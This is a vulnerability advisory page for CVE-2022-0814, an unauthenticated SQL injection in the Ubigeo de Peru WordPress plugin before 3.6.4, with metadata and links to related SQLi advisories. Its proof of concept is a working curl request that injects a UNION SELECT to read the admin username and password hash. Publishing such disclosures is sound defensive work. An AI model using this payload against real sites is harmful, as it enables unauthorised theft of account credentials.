Ubigeo de Peru < 3.6.4 – Unauthenticated SQLi | CVE 2022-0814 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections

Proof of Concept

curl https://example.com/wp-admin/admin-ajax.php \
    --data 'action=rt_ubigeo_load_distritos_address&idProv=1 UNION SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1) from wp_users#'

Affects Plugins

Fixed in 3.6.4

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

fd84dc08-0079-4fcf-81c3-a61d652e3269

Timeline

Publicly Published

2022-04-18 (about 2 years ago)

Added

2022-04-18 (about 2 years ago)

Last Updated

2022-04-19 (about 2 years ago)

Other

Published

Title

Published

2015-10-06

Title

Support Ticket System <= 1.2 - Unauthenticated SQL Injection

Published

2024-01-18

Title

Smart Manager < 8.28.0 - Admin+ SQL Injection

Published

2016-08-01

Title

Booking Calendar <= 6.2 - SQL Injection

Published

2015-08-26

Title

Car Rental System <= 3.0 - SQL Injection

Published

2014-08-01

Title

Editorial Calendar 2.6 - Post Query Multiple Filter SQL Injection